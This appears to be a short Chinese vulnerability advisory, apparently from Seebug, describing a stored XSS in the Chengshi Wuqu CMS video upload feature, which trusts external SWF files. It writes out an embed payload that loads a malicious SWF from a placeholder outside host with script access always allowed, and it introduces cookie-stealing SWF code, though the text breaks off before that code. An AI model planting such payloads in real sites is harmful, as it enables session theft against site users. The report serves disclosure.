程氏舞曲CMS储存型 xss(5)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt,swf啊。。 ### 详细说明: 上传视频处 。对于外部swf文件 过分信任 [<img src="https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg" alt="c1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg) 可插入 如下代码 <embed src=http://xxx.xxx/xss.swf type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always"> 构造 恶意的 swf 执行 js 像这样 alert [<img src="https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg" alt="c2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg) [<img src="https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg" alt="c3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg) 这是 获取cookie的swf代码 ``` package...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息